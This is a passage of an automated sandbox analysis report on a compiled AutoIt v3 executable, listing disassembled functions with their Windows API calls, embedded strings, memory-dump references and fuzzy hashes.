                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                  • API String ID: 0-4285391669
                                                                                                                                                                                                                                  • Opcode ID: 16c192678a850401387b88bcf1ad387670ca4534157596f07332fcfd60d0227d
                                                                                                                                                                                                                                  • Instruction ID: 403eee5cd0eae762e612f1b23b50cc84a6b9d49409405184ffc8ea0469f0cb1a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16c192678a850401387b88bcf1ad387670ca4534157596f07332fcfd60d0227d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87623770508381CFC725DF29D094AAABBE5BFC9308F14896EE4998B352DB71D945CF82
                                                                                                                                                                                                                                  Function 009935B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1177 9935b3-993623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009935E1
                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00993602
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 00993616
                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00993368,?), ref: 0099361F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$CreateShow
                                                                                                                                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                  • Opcode ID: 717ae9747c1d6b53c54358061c9420c1614f0d0b998fef60bc54b2020ace3760
                                                                                                                                                                                                                                  • Instruction ID: 9409160d031f0da7525f335806953e0007d9c7c7d5a1ff8d2ecb684ad8ebe2b4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 717ae9747c1d6b53c54358061c9420c1614f0d0b998fef60bc54b2020ace3760
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBF030745002947AE73187576C0CF372E7DD7C6F50B10002DFA04AB2A0C2A90842DBB0
                                                                                                                                                                                                                                  Function 009961A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009D5287
                                                                                                                                                                                                                                    • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00996299
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                  • String ID: Line %d: $AutoIt - $D$D$
                                                                                                                                                                                                                                  • API String ID: 2289894680-1946737638
                                                                                                                                                                                                                                  • Opcode ID: 6a04f6cdd9200452086eb64c0fe2de37b8d3745868e9b2e75139477001163c6f
                                                                                                                                                                                                                                  • Instruction ID: 6aa171efc51cb7759d24fddc446cef0a0596a558d0b93e4f8765824f7a515dc2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a04f6cdd9200452086eb64c0fe2de37b8d3745868e9b2e75139477001163c6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE41B671408704AACB11EB68EC45FEF77ECAFD4320F104A2EF599921A1EF749649C792
                                                                                                                                                                                                                                  Function 009FF292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 009FF2AE
                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 009FF2BC
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 009FF2C4
                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 009FF2CE
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 009FF30A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                                                                                                  • Opcode ID: 61f6f1d043b980d1a2e7e2adab4ad989a87553db87aa790fa4093b524e60932f
                                                                                                                                                                                                                                  • Instruction ID: a89e9085a59701614b948d4e7e3a072fce6e19a94122cf1ec2d33dbab3e455ac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61f6f1d043b980d1a2e7e2adab4ad989a87553db87aa790fa4093b524e60932f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B017531C0021DDBDF10EFE8E858AFEBB78BF08700F000466E601B2254CB7095668BA1
                                                                                                                                                                                                                                  Function 009958CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,009958BE,SwapMouseButtons,00000004,?), ref: 009958EF
                                                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,009958BE,SwapMouseButtons,00000004,?), ref: 00995910
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,009958BE,SwapMouseButtons,00000004,?), ref: 00995932
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                  • Opcode ID: eec97c2634d512e6fef2f9ad37de5e5032cd7e50fc5fdfee101f0951465c6d28
                                                                                                                                                                                                                                  • Instruction ID: f826bef86ffa89da07c4f7362fc0fdee1e725a218dd821d94b3efe67a41ced1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eec97c2634d512e6fef2f9ad37de5e5032cd7e50fc5fdfee101f0951465c6d28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8115A75510618FFEF228FA8CC84DAF77BCEF05760B514429F802E7210E2319E429B60
                                                                                                                                                                                                                                  Function 0099F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Variable must be of type 'Object'., xrefs: 009E48C6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                  • API String ID: 0-109567571
                                                                                                                                                                                                                                  • Opcode ID: da39203e7dfd70ed6c30acb63fe745dc45a696775695a66a7c0309ee9b765714
                                                                                                                                                                                                                                  • Instruction ID: 5b6e18131ee7494cd27af77112d5adfcbb22d0dbfed390a674e5bc8f71a77ae3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da39203e7dfd70ed6c30acb63fe745dc45a696775695a66a7c0309ee9b765714
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1C27A71A00205DFCF24CF98C8A0BAEF7B5BF49314F248569E945AB391E775AD42CB90
                                                                                                                                                                                                                                  Function 009A0340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 009A15F2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1385522511-0
                                                                                                                                                                                                                                  • Opcode ID: ac6370da1b545edd1f95d771fd1684747e1ac968fd479277bb40cd1c1dbd88bb
                                                                                                                                                                                                                                  • Instruction ID: 35b8d1cf69be644bbd34d673434e974224b19f5dba07e113b73d7650e0c1350c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac6370da1b545edd1f95d771fd1684747e1ac968fd479277bb40cd1c1dbd88bb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5B26675A08341CFCB24CF19C480A2AB7F5BBDA314F24895DE98A8B391D775ED41CB92
                                                                                                                                                                                                                                  Function 00A0DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00A0DB75
                                                                                                                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A0DB7F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                  • String ID: |
                                                                                                                                                                                                                                  • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                  • Opcode ID: 164308e9137a0eda9bbd636b84f104c63bb0bf93114d017f9214c88dff9ca541
                                                                                                                                                                                                                                  • Instruction ID: 52ec9805bd80ec2f44e0281ef7893f9a70c0146aff8d4063ca4b3f0d912b73af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 164308e9137a0eda9bbd636b84f104c63bb0bf93114d017f9214c88dff9ca541
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF315E72801109ABDF15DFB5DD85AEEBFB9FF49304F100029F815A6162EB719A06CB60
                                                                                                                                                                                                                                  Function 00A0D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A0D7C2
                                                                                                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A0D7EB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                                                                                                  • String ID: <local>
                                                                                                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                  • Opcode ID: 151db31e36535adc9a8abad2e620cb35c0c131f26bd9619e757b54180e6e7d9a
                                                                                                                                                                                                                                  • Instruction ID: 05433c83f00afbffb8ed4d3bf780092aae26dc855c7eeb4ff4d9418fbcb34ea4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 151db31e36535adc9a8abad2e620cb35c0c131f26bd9619e757b54180e6e7d9a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE11067214123ABED7344BA6AC45EF7BE6CEB127A4F00422AB509920C0D2648840C2F0
                                                                                                                                                                                                                                  Function 009B014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 009B09D8
                                                                                                                                                                                                                                    • Part of subcall function 009B3614: RaiseException.KERNEL32(?,?,?,009B09FA,?,00000000,?,?,?,?,?,?,009B09FA,00000000,00A59758,00000000), ref: 009B3674
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 009B09F5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                  • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                  • Opcode ID: 8a7852e02a2a748d48c8596af6cafd3e0565972398cac0d3f2f532fb704f7023
                                                                                                                                                                                                                                  • Instruction ID: f41246ed50ea447d9f86990faa75946a393a21d74f6d54e17fdcee416e7a4cd3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a7852e02a2a748d48c8596af6cafd3e0565972398cac0d3f2f532fb704f7023
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F0C23490420CB7DB04BAA8DE46ADF776C6E80770B608521F924965E2FB70EA19C6D0
                                                                                                                                                                                                                                  Function 00A189B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A18D52
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00A18D59
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A18F3A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 146820519-0
                                                                                                                                                                                                                                  • Opcode ID: b2e1d093be1ba7c704d6fba6479e13109575816f817f6270399c2c100d94875d
                                                                                                                                                                                                                                  • Instruction ID: 63f23d968b7946d8a21756c5123dc0427c123002f19e9614822b835a7ad38883
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2e1d093be1ba7c704d6fba6479e13109575816f817f6270399c2c100d94875d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B126B71A083019FC714DF28C584B6ABBE5FF88314F14895DE8899B292DB35ED85CB92
                                                                                                                                                                                                                                  Function 00A19AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 306214811-0
                                                                                                                                                                                                                                  • Opcode ID: 2646c5ab69ddcaf8032e6cc9506e32c809b72dec473e805690b2d3cea015fa6d
                                                                                                                                                                                                                                  • Instruction ID: 9fa12fbeaeb894907c600d81653e86f75efc0c0d12e8d9655307fab553a84a90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2646c5ab69ddcaf8032e6cc9506e32c809b72dec473e805690b2d3cea015fa6d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15A15E31604505DFCB18DF18D5E1AAABBB1FF85314B6084ADE84A8F292DB31ED81CBC0
                                                                                                                                                                                                                                  Function 00992793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009932AF
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 009932B7
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009932C2
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009932CD
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 009932D5
                                                                                                                                                                                                                                    • Part of subcall function 0099327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 009932DD
                                                                                                                                                                                                                                    • Part of subcall function 00993205: RegisterWindowMessageW.USER32(00000004,?,00992964), ref: 0099325D
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00992A0A
                                                                                                                                                                                                                                  • OleInitialize.OLE32 ref: 00992A28
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 009D3A0D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1986988660-0
                                                                                                                                                                                                                                  • Opcode ID: 4eaa97928bedddda42e9b7361f30a863eec4a752ed78c5bf2e16972b0e1d844a
                                                                                                                                                                                                                                  • Instruction ID: aa9620272d418f5f597ff67004bc9661082fd3d8e06aa0297e1d5514ce5060c5
